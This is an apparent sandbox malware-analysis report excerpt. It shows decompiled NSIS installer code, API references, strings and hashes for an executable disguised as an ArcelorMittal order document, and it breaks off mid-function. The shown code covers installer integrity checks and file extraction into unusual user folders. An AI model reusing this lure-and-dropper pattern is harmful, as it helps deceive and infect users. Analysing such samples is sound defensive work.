                                                              						_t70 = ( ~( *0x7a8a54) & 0x00007e00) + 0x200;
                                                              						__eflags = _t93 - _t70;
                                                              						if(_t93 >= _t70) {
                                                              							_t90 = _t70;
                                                              						}
                                                              						_t71 = E0040321F(0x797700, _t90);
                                                              						__eflags = _t71;
                                                              						if(_t71 == 0) {
                                                              							E00402D8A(1);
                                                              							L29:
                                                              							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                              						}
                                                              						__eflags =  *0x7a8a54;
                                                              						if( *0x7a8a54 != 0) {
                                                              							__eflags = _a4 & 0x00000002;
                                                              							if((_a4 & 0x00000002) == 0) {
                                                              								E00402D8A(0);
                                                              							}
                                                              							goto L20;
                                                              						}
                                                              						E00405BC2( &_v44, 0x797700, 0x1c);
                                                              						_t77 = _v44;
                                                              						__eflags = _t77 & 0xfffffff0;
                                                              						if((_t77 & 0xfffffff0) != 0) {
                                                              							goto L20;
                                                              						}
                                                              						__eflags = _v40 - 0xdeadbeef;
                                                              						if(_v40 != 0xdeadbeef) {
                                                              							goto L20;
                                                              						}
                                                              						__eflags = _v28 - 0x74736e49;
                                                              						if(_v28 != 0x74736e49) {
                                                              							goto L20;
                                                              						}
                                                              						__eflags = _v32 - 0x74666f73;
                                                              						if(_v32 != 0x74666f73) {
                                                              							goto L20;
                                                              						}
                                                              						__eflags = _v36 - 0x6c6c754e;
                                                              						if(_v36 != 0x6c6c754e) {
                                                              							goto L20;
                                                              						}
                                                              						_a4 = _a4 | _t77;
                                                              						_t87 =  *0x78b6f4; // 0x24cc4
                                                              						 *0x7a8ae0 =  *0x7a8ae0 | _a4 & 0x00000002;
                                                              						_t80 = _v20;
                                                              						__eflags = _t80 - _t93;
                                                              						 *0x7a8a54 = _t87;
                                                              						if(_t80 > _t93) {
                                                              							goto L29;
                                                              						}
                                                              						__eflags = _a4 & 0x00000008;
                                                              						if((_a4 & 0x00000008) != 0) {
                                                              							L16:
                                                              							_v8 = _v8 + 1;
                                                              							_t93 = _t80 - 4;
                                                              							__eflags = _t90 - _t93;
                                                              							if(_t90 > _t93) {
                                                              								_t90 = _t93;
                                                              							}
                                                              							goto L20;
                                                              						}
                                                              						__eflags = _a4 & 0x00000004;
                                                              						if((_a4 & 0x00000004) != 0) {
                                                              							break;
                                                              						}
                                                              						goto L16;
                                                              						L20:
                                                              						__eflags = _t93 -  *0x7976fc; // 0x253b8
                                                              						if(__eflags < 0) {
                                                              							_v12 = E004064B9(_v12, 0x797700, _t90);
                                                              						}
                                                              						 *0x78b6f4 =  *0x78b6f4 + _t90;
                                                              						_t93 = _t93 - _t90;
                                                              						__eflags = _t93;
                                                              					} while (_t93 > 0);
                                                              					_t82 = 0;
                                                              					__eflags = 0;
                                                              					goto L24;
                                                              				}
                                                              			}































                                                              0x00402df6
                                                              0x00402df9
                                                              0x00402dfc
                                                              0x00402dff
                                                              0x00402e05
                                                              0x00402e16
                                                              0x00402e1b
                                                              0x00402e2e
                                                              0x00402e33
                                                              0x00402e36
                                                              0x00402e3c
                                                              0x00000000
                                                              0x00402e3e
                                                              0x00402e49
                                                              0x00402e4f
                                                              0x00402e60
                                                              0x00402e67
                                                              0x00402e6d
                                                              0x00402e6f
                                                              0x00402e74
                                                              0x00402e76
                                                              0x00402f63
                                                              0x00402f65
                                                              0x00402f6a
                                                              0x00402f71
                                                              0x00000000
                                                              0x00000000
                                                              0x00402f73
                                                              0x00402f76
                                                              0x00402f9a
                                                              0x00402f9f
                                                              0x00402fa5
                                                              0x00402fb0
                                                              0x00402fb5
                                                              0x00402fb8
                                                              0x00402fb9
                                                              0x00402fba
                                                              0x00402fbc
                                                              0x00402fc1
                                                              0x00402fc4
                                                              0x00402fd7
                                                              0x00402fdb
                                                              0x00402fe3
                                                              0x00402fe8
                                                              0x00402fea
                                                              0x00402fea
                                                              0x00402fea
                                                              0x00402ff2
                                                              0x00402ff2
                                                              0x00402ff5
                                                              0x00402ff6
                                                              0x00402ff6
                                                              0x00402ff9
                                                              0x00402ffb
                                                              0x00402ffb
                                                              0x00402ffb
                                                              0x00403005
                                                              0x0040300b
                                                              0x00403019
                                                              0x0040301e
                                                              0x00000000
                                                              0x0040301e
                                                              0x00000000
                                                              0x00402fc4
                                                              0x00402f7e
                                                              0x00402f89
                                                              0x00402f8e
                                                              0x00402f90
                                                              0x00000000
                                                              0x00000000
                                                              0x00402f95
                                                              0x00402f98
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00402e7c
                                                              0x00402e81
                                                              0x00402e86
                                                              0x00402e8a
                                                              0x00402e91
                                                              0x00402e96
                                                              0x00402e98
                                                              0x00402e9a
                                                              0x00402e9a
                                                              0x00402e9e
                                                              0x00402ea3
                                                              0x00402ea5
                                                              0x00402fcf
                                                              0x00402fc6
                                                              0x00000000
                                                              0x00402fc6
                                                              0x00402eab
                                                              0x00402eb2
                                                              0x00402f2e
                                                              0x00402f32
                                                              0x00402f36
                                                              0x00402f3b
                                                              0x00000000
                                                              0x00402f32
                                                              0x00402ebb
                                                              0x00402ec0
                                                              0x00402ec3
                                                              0x00402ec8
                                                              0x00000000
                                                              0x00000000
                                                              0x00402eca
                                                              0x00402ed1
                                                              0x00000000
                                                              0x00000000
                                                              0x00402ed3
                                                              0x00402eda
                                                              0x00000000
                                                              0x00000000
                                                              0x00402edc
                                                              0x00402ee3
                                                              0x00000000
                                                              0x00000000
                                                              0x00402ee5
                                                              0x00402eec
                                                              0x00000000
                                                              0x00000000
                                                              0x00402eee
                                                              0x00402ef4
                                                              0x00402efd
                                                              0x00402f03
                                                              0x00402f06
                                                              0x00402f08
                                                              0x00402f0e
                                                              0x00000000
                                                              0x00000000
                                                              0x00402f14
                                                              0x00402f18
                                                              0x00402f20
                                                              0x00402f20
                                                              0x00402f23
                                                              0x00402f26
                                                              0x00402f28
                                                              0x00402f2a
                                                              0x00402f2a
                                                              0x00000000
                                                              0x00402f28
                                                              0x00402f1a
                                                              0x00402f1e
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00402f3c
                                                              0x00402f3c
                                                              0x00402f42
                                                              0x00402f4e
                                                              0x00402f4e
                                                              0x00402f51
                                                              0x00402f57
                                                              0x00402f59
                                                              0x00402f59
                                                              0x00402f61
                                                              0x00402f61
                                                              0x00000000
                                                              0x00402f61

                                                              APIs
                                                              • GetTickCount.KERNEL32 ref: 00402DFF
                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe,00000400,?,?,00000000,00403517,?), ref: 00402E1B
                                                                • Part of subcall function 00405C07: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe,80000000,00000003,?,?,00000000,00403517,?), ref: 00405C0B
                                                                • Part of subcall function 00405C07: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,00403517,?), ref: 00405C2D
                                                              • GetFileSize.KERNEL32(00000000,00000000,Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe,C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe,80000000,00000003,?,?,00000000,00403517,?), ref: 00402E67
                                                              Strings
                                                              • Error launching installer, xrefs: 00402E3E
                                                              • Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe, xrefs: 00402E5B
                                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00402FC6
                                                              • C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe, xrefs: 00402E05, 00402E14, 00402E28, 00402E48
                                                              • C:\Users\user\Desktop, xrefs: 00402E49, 00402E4E, 00402E54
                                                              • soft, xrefs: 00402EDC
                                                              • Inst, xrefs: 00402ED3
                                                              • Null, xrefs: 00402EE5
                                                              • "C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe", xrefs: 00402DF4
                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00402DF5
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                              • String ID: "C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe$soft
                                                              • API String ID: 4283519449-3375540769
                                                              • Opcode ID: 2249d346c310f13e90e060258289ef97018bdecfafda78b47c803c2d5af002aa
                                                              • Instruction ID: ab97cff943281949067decbc104515b53a1facb94f92f7dd678b53d189ae88d2
                                                              • Opcode Fuzzy Hash: 2249d346c310f13e90e060258289ef97018bdecfafda78b47c803c2d5af002aa
                                                              • Instruction Fuzzy Hash: 6351F671940206ABCB109F65DE49B9E7BB8FB15394F20813BF904B62C1D7BC9D809B5D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 756 401767-40178c call 402bbf call 405a5d 761 401796-4017a8 call 406032 call 4059e6 lstrcatW 756->761 762 40178e-401794 call 406032 756->762 767 4017ad-4017ae call 4062c6 761->767 762->767 771 4017b3-4017b7 767->771 772 4017b9-4017c3 call 406375 771->772 773 4017ea-4017ed 771->773 781 4017d5-4017e7 772->781 782 4017c5-4017d3 CompareFileTime 772->782 774 4017f5-401811 call 405c07 773->774 775 4017ef-4017f0 call 405be2 773->775 783 401813-401816 774->783 784 401885-4018ae call 405191 call 403027 774->784 775->774 781->773 782->781 785 401867-401871 call 405191 783->785 786 401818-401856 call 406032 * 2 call 406054 call 406032 call 405777 783->786 798 4018b0-4018b4 784->798 799 4018b6-4018c2 SetFileTime 784->799 796 40187a-401880 785->796 786->771 818 40185c-40185d 786->818 801 402a55 796->801 798->799 800 4018c8-4018d3 CloseHandle 798->800 799->800 803 4018d9-4018dc 800->803 804 402a4c-402a4f 800->804 805 402a57-402a5b 801->805 807 4018f1-4018f4 call 406054 803->807 808 4018de-4018ef call 406054 lstrcatW 803->808 804->801 815 4018f9-402283 807->815 808->815 819 402288-40228d 815->819 820 402283 call 405777 815->820 818->796 821 40185f-401860 818->821 819->805 820->819 821->785
                                                              C-Code - Quality: 61%
                                                              			E00401767(FILETIME* __ebx, void* __eflags) {
                                                              				void* __edi;
                                                              				void* _t35;
                                                              				void* _t43;
                                                              				void* _t45;
                                                              				FILETIME* _t51;
                                                              				FILETIME* _t64;
                                                              				void* _t66;
                                                              				signed int _t72;
                                                              				FILETIME* _t73;
                                                              				FILETIME* _t77;
                                                              				signed int _t79;
                                                              				void* _t81;
                                                              				void* _t82;
                                                              				WCHAR* _t84;
                                                              				void* _t86;
                                                              
                                                              				_t77 = __ebx;
                                                              				 *(_t86 - 0xc) = E00402BBF(0x31);
                                                              				 *(_t86 + 8) =  *(_t86 - 0x2c) & 0x00000007;
                                                              				_t35 = E00405A5D( *(_t86 - 0xc));
                                                              				_push( *(_t86 - 0xc));
                                                              				_t84 = L"Call";
                                                              				if(_t35 == 0) {
                                                              					lstrcatW(E004059E6(E00406032(_t84, L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Jansis\\Grusendes\\Stoser\\Unappealingness\\Dermobranchiate")), ??);
                                                              				} else {
                                                              					E00406032();
                                                              				}
                                                              				E004062C6(_t84);
                                                              				while(1) {
                                                              					__eflags =  *(_t86 + 8) - 3;
                                                              					if( *(_t86 + 8) >= 3) {
                                                              						_t66 = E00406375(_t84);
                                                              						_t79 = 0;
                                                              						__eflags = _t66 - _t77;
                                                              						if(_t66 != _t77) {
                                                              							_t73 = _t66 + 0x14;
                                                              							__eflags = _t73;
                                                              							_t79 = CompareFileTime(_t73, _t86 - 0x20);
                                                              						}
                                                              						asm("sbb eax, eax");
                                                              						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                                                              						__eflags = _t72;
                                                              						 *(_t86 + 8) = _t72;
                                                              					}
                                                              					__eflags =  *(_t86 + 8) - _t77;
                                                              					if( *(_t86 + 8) == _t77) {
                                                              						E00405BE2(_t84);
                                                              					}
                                                              					__eflags =  *(_t86 + 8) - 1;
                                                              					_t43 = E00405C07(_t84, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
                                                              					__eflags = _t43 - 0xffffffff;
                                                              					 *(_t86 - 8) = _t43;
                                                              					if(_t43 != 0xffffffff) {
                                                              						break;
                                                              					}
                                                              					__eflags =  *(_t86 + 8) - _t77;
                                                              					if( *(_t86 + 8) != _t77) {
                                                              						E00405191(0xffffffe2,  *(_t86 - 0xc));
                                                              						__eflags =  *(_t86 + 8) - 2;
                                                              						if(__eflags == 0) {
                                                              							 *((intOrPtr*)(_t86 - 4)) = 1;
                                                              						}
                                                              						L31:
                                                              						 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t86 - 4));
                                                              						__eflags =  *0x7a8ac8;
                                                              						goto L32;
                                                              					} else {
                                                              						E00406032("C:\Users\Arthur\AppData\Local\Temp\nspD224.tmp", _t81);
                                                              						E00406032(_t81, _t84);
                                                              						E00406054(_t77, _t81, _t84, "C:\Users\Arthur\AppData\Local\Temp\nspD224.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x18)));
                                                              						E00406032(_t81, "C:\Users\Arthur\AppData\Local\Temp\nspD224.tmp");
                                                              						_t64 = E00405777("C:\Users\Arthur\AppData\Local\Temp\nspD224.tmp\System.dll",  *(_t86 - 0x2c) >> 3) - 4;
                                                              						__eflags = _t64;
                                                              						if(_t64 == 0) {
                                                              							continue;
                                                              						} else {
                                                              							__eflags = _t64 == 1;
                                                              							if(_t64 == 1) {
                                                              								 *0x7a8ac8 =  &( *0x7a8ac8->dwLowDateTime);
                                                              								L32:
                                                              								_t51 = 0;
                                                              								__eflags = 0;
                                                              							} else {
                                                              								_push(_t84);
                                                              								_push(0xfffffffa);
                                                              								E00405191();
                                                              								L29:
                                                              								_t51 = 0x7fffffff;
                                                              							}
                                                              						}
                                                              					}
                                                              					L33:
                                                              					return _t51;
                                                              				}
                                                              				E00405191(0xffffffea,  *(_t86 - 0xc));
                                                              				 *0x7a8af4 =  *0x7a8af4 + 1;
                                                              				_push(_t77);
                                                              				_push(_t77);
                                                              				_push( *(_t86 - 8));
                                                              				_push( *((intOrPtr*)(_t86 - 0x24)));
                                                              				_t45 = E00403027(); // executed
                                                              				 *0x7a8af4 =  *0x7a8af4 - 1;
                                                              				__eflags =  *(_t86 - 0x20) - 0xffffffff;
                                                              				_t82 = _t45;
                                                              				if( *(_t86 - 0x20) != 0xffffffff) {
                                                              					L22:
                                                              					SetFileTime( *(_t86 - 8), _t86 - 0x20, _t77, _t86 - 0x20); // executed
                                                              				} else {
                                                              					__eflags =  *((intOrPtr*)(_t86 - 0x1c)) - 0xffffffff;
                                                              					if( *((intOrPtr*)(_t86 - 0x1c)) != 0xffffffff) {
                                                              						goto L22;
                                                              					}
                                                              				}
                                                              				CloseHandle( *(_t86 - 8));
                                                              				__eflags = _t82 - _t77;
                                                              				if(_t82 >= _t77) {
                                                              					goto L31;
                                                              				} else {
                                                              					__eflags = _t82 - 0xfffffffe;
                                                              					if(_t82 != 0xfffffffe) {
                                                              						E00406054(_t77, _t82, _t84, _t84, 0xffffffee);
                                                              					} else {
                                                              						E00406054(_t77, _t82, _t84, _t84, 0xffffffe9);
                                                              						lstrcatW(_t84,  *(_t86 - 0xc));
                                                              					}
                                                              					_push(0x200010);
                                                              					_push(_t84);
                                                              					E00405777();
                                                              					goto L29;
                                                              				}
                                                              				goto L33;
                                                              			}


















                                                              0x00401767
                                                              0x0040176e
                                                              0x0040177a
                                                              0x0040177d
                                                              0x00401782
                                                              0x00401785
                                                              0x0040178c
                                                              0x004017a8
                                                              0x0040178e
                                                              0x0040178f
                                                              0x0040178f
                                                              0x004017ae
                                                              0x004017b3
                                                              0x004017b3
                                                              0x004017b7
                                                              0x004017ba
                                                              0x004017bf
                                                              0x004017c1
                                                              0x004017c3
                                                              0x004017c8
                                                              0x004017c8
                                                              0x004017d3
                                                              0x004017d3
                                                              0x004017e4
                                                              0x004017e6
                                                              0x004017e6
                                                              0x004017e7
                                                              0x004017e7
                                                              0x004017ea
                                                              0x004017ed
                                                              0x004017f0
                                                              0x004017f0
                                                              0x004017f7
                                                              0x00401806
                                                              0x0040180b
                                                              0x0040180e
                                                              0x00401811
                                                              0x00000000
                                                              0x00000000
                                                              0x00401813
                                                              0x00401816
                                                              0x0040186c
                                                              0x00401871
                                                              0x004015ae
                                                              0x0040281e
                                                              0x0040281e
                                                              0x00402a4c
                                                              0x00402a4f
                                                              0x00402a4f
                                                              0x00000000
                                                              0x00401818
                                                              0x0040181e
                                                              0x00401825
                                                              0x00401832
                                                              0x0040183d
                                                              0x00401853
                                                              0x00401853
                                                              0x00401856
                                                              0x00000000
                                                              0x0040185c
                                                              0x0040185c
                                                              0x0040185d
                                                              0x0040187a
                                                              0x00402a55
                                                              0x00402a55
                                                              0x00402a55
                                                              0x0040185f
                                                              0x0040185f
                                                              0x00401860
                                                              0x00401493
                                                              0x00402288
                                                              0x00402288
                                                              0x00402288
                                                              0x0040185d
                                                              0x00401856
                                                              0x00402a57
                                                              0x00402a5b
                                                              0x00402a5b
                                                              0x0040188a
                                                              0x0040188f
                                                              0x00401895
                                                              0x00401896
                                                              0x00401897
                                                              0x0040189a
                                                              0x0040189d
                                                              0x004018a2
                                                              0x004018a8
                                                              0x004018ac
                                                              0x004018ae
                                                              0x004018b6
                                                              0x004018c2
                                                              0x004018b0
                                                              0x004018b0
                                                              0x004018b4
                                                              0x00000000
                                                              0x00000000
                                                              0x004018b4
                                                              0x004018cb
                                                              0x004018d1
                                                              0x004018d3
                                                              0x00000000
                                                              0x004018d9
                                                              0x004018d9
                                                              0x004018dc
                                                              0x004018f4
                                                              0x004018de
                                                              0x004018e1
                                                              0x004018ea
                                                              0x004018ea
                                                              0x004018f9
                                                              0x004018fe
                                                              0x00402283
                                                              0x00000000
                                                              0x00402283
                                                              0x00000000

                                                              APIs
                                                              • lstrcatW.KERNEL32(00000000,00000000), ref: 004017A8
                                                              • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis\Grusendes\Stoser\Unappealingness\Dermobranchiate,?,?,00000031), ref: 004017CD
                                                                • Part of subcall function 00406032: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,0040332D,Overcaustically Setup,NSIS Error), ref: 0040603F
                                                                • Part of subcall function 00405191: lstrlenW.KERNEL32(007A0F20,00000000,007924F8,762E23A0,?,?,?,?,?,?,?,?,?,00403168,00000000,?), ref: 004051C9
                                                                • Part of subcall function 00405191: lstrlenW.KERNEL32(00403168,007A0F20,00000000,007924F8,762E23A0,?,?,?,?,?,?,?,?,?,00403168,00000000), ref: 004051D9
                                                                • Part of subcall function 00405191: lstrcatW.KERNEL32(007A0F20,00403168), ref: 004051EC
                                                                • Part of subcall function 00405191: SetWindowTextW.USER32(007A0F20,007A0F20), ref: 004051FE
                                                                • Part of subcall function 00405191: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405224
                                                                • Part of subcall function 00405191: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523E
                                                                • Part of subcall function 00405191: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                              • String ID: C:\Users\user\AppData\Local\Temp\nspD224.tmp$C:\Users\user\AppData\Local\Temp\nspD224.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis\Grusendes\Stoser\Unappealingness\Dermobranchiate$Call
                                                              • API String ID: 1941528284-1014108552
                                                              • Opcode ID: f68a6b2c34e2433bc227599e278aafb616f0a180d0c639fbdfc3b46ee5da03b6
                                                              • Instruction ID: 9699be85dc7bc18e029f6e3bff89e0f5bb762e6a6aa9adbfdaf5ed0cd7dffae0
                                                              • Opcode Fuzzy Hash: f68a6b2c34e2433bc227599e278aafb616f0a180d0c639fbdfc3b46ee5da03b6
                                                              • Instruction Fuzzy Hash: A341D571940515BBCF10BBB5CC46DAF3679EF06369B20823BF122B10E1DB3C8A519A6D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 822 4025e5-4025fa call 402ba2 825 402600-402607 822->825 826 402a4c-402a4f 822->826 828 402609 825->828 829 40260c-40260f 825->829 827 402a55-402a5b 826->827 828->829 831 402773-40277b 829->831 832 402615-402624 call 405f92 829->832 831->826 832->831 835 40262a 832->835 836 402630-402634 835->836 837 4026c9-4026cc 836->837 838 40263a-402655 ReadFile 836->838 840 4026e4-4026f4 call 405c8a 837->840 841 4026ce-4026d1 837->841 838->831 839 40265b-402660 838->839 839->831 843 402666-402674 839->843 840->831 850 4026f6 840->850 841->840 844 4026d3-4026de call 405ce8 841->844 846 40267a-40268c MultiByteToWideChar 843->846 847 40272f-40273b call 405f79 843->847 844->831 844->840 846->850 851 40268e-402691 846->851 847->827 853 4026f9-4026fc 850->853 854 402693-40269e 851->854 853->847 856 4026fe-402703 853->856 854->853 857 4026a0-4026c5 SetFilePointer MultiByteToWideChar 854->857 858 402740-402744 856->858 859 402705-40270a 856->859 857->854 860 4026c7 857->860 862 402761-40276d SetFilePointer 858->862 863 402746-40274a 858->863 859->858 861 40270c-40271f 859->861 860->850 861->831 866 402721-402727 861->866 862->831 864 402752-40275f 863->864 865 40274c-402750 863->865 864->831 865->862 865->864 866->836 867 40272d 866->867 867->831
                                                              C-Code - Quality: 83%
                                                              			E004025E5(intOrPtr __ebx, void* __esi) {
                                                              				intOrPtr _t64;
                                                              				intOrPtr _t65;
                                                              				void* _t73;
                                                              				void* _t76;
                                                              
                                                              				 *((intOrPtr*)(_t73 - 0xc)) = __ebx;
                                                              				_t64 = 2;
                                                              				 *((intOrPtr*)(_t73 - 0x3c)) = _t64;
                                                              				_t65 = E00402BA2(_t64);
                                                              				_t76 = _t65 - 1;
                                                              				 *((intOrPtr*)(_t73 - 0x48)) = _t65;
                                                              				if(_t76 < 0) {
                                                              					L36:
                                                              					 *0x7a8ac8 =  *0x7a8ac8 +  *(_t73 - 4);
                                                              				} else {
                                                              					__ecx = 0x3ff;
                                                              					if(__eax > 0x3ff) {
                                                              						 *(__ebp - 0x48) = 0x3ff;
                                                              					}
                                                              					if( *__esi == __bx) {
                                                              						L34:
                                                              						__ecx =  *(__ebp - 0x10);
                                                              						__eax =  *(__ebp - 0xc);
                                                              						 *( *(__ebp - 0x10) +  *(__ebp - 0xc) * 2) = __bx;
                                                              						if(_t76 == 0) {
                                                              							 *(_t73 - 4) = 1;
                                                              						}
                                                              						goto L36;
                                                              					} else {
                                                              						 *(__ebp - 8) = __ebx;
                                                              						 *(__ebp - 0x14) = E00405F92(__ecx, __esi);
                                                              						if( *(__ebp - 0x48) > __ebx) {
                                                              							do {
                                                              								if( *((intOrPtr*)(__ebp - 0x30)) != 0x39) {
                                                              									if( *((intOrPtr*)(__ebp - 0x20)) != __ebx ||  *(__ebp - 0xc) != __ebx || E00405CE8( *(__ebp - 0x14), __ebx) >= 0) {
                                                              										__eax = __ebp - 0x40;
                                                              										if(E00405C8A( *(__ebp - 0x14), __ebp - 0x40, 2) == 0) {
                                                              											goto L34;
                                                              										} else {
                                                              											goto L21;
                                                              										}
                                                              									} else {
                                                              										goto L34;
                                                              									}
                                                              								} else {
                                                              									__eax = __ebp - 0x38;
                                                              									_push(__ebx);
                                                              									_push(__ebp - 0x38);
                                                              									__eax = 2;
                                                              									__ebp - 0x38 -  *((intOrPtr*)(__ebp - 0x20)) = __ebp + 0xa;
                                                              									__eax = ReadFile( *(__ebp - 0x14), __ebp + 0xa, __ebp - 0x38 -  *((intOrPtr*)(__ebp - 0x20)), ??, ??); // executed
                                                              									if(__eax == 0) {
                                                              										goto L34;
                                                              									} else {
                                                              										__ecx =  *(__ebp - 0x38);
                                                              										if(__ecx == __ebx) {
                                                              											goto L34;
                                                              										} else {
                                                              											__ax =  *(__ebp + 0xa) & 0x000000ff;
                                                              											 *(__ebp - 0x3c) = __ecx;
                                                              											 *(__ebp - 0x40) = __eax;
                                                              											if( *((intOrPtr*)(__ebp - 0x20)) != __ebx) {
                                                              												L28:
                                                              												__ax & 0x0000ffff = E00405F79( *(__ebp - 0x10), __ax & 0x0000ffff);
                                                              											} else {
                                                              												__ebp - 0x40 = __ebp + 0xa;
                                                              												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x40, 1) != 0) {
                                                              													L21:
                                                              													__eax =  *(__ebp - 0x40);
                                                              												} else {
                                                              													__esi =  *(__ebp - 0x3c);
                                                              													__esi =  ~( *(__ebp - 0x3c));
                                                              													while(1) {
                                                              														_t21 = __ebp - 0x38;
                                                              														 *_t21 =  *(__ebp - 0x38) - 1;
                                                              														__eax = 0xfffd;
                                                              														 *(__ebp - 0x40) = 0xfffd;
                                                              														if( *_t21 == 0) {
                                                              															goto L22;
                                                              														}
                                                              														 *(__ebp - 0x3c) =  *(__ebp - 0x3c) - 1;
                                                              														__esi = __esi + 1;
                                                              														__eax = SetFilePointer( *(__ebp - 0x14), __esi, __ebx, 1); // executed
                                                              														__ebp - 0x40 = __ebp + 0xa;
